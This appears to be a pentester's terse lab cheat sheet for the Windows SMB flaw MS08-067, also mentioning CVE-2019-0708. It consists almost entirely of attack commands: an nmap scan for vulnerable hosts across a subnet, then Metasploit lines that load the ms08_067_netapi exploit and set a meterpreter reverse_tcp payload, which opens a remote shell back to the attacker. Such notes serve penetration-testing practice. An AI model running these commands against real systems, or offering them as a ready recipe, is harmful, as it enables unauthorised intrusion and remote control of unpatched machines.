MS08 067

>nmap -sT -p 445,139 -open -v -Pn --script=smb-vuln-ms08-067.nse 10.11.1.0/20
>use exploit/windows/smb/ms08_067_netapi
>set payload windows/meterpreter/reverse_tcp
CVE-2019-0708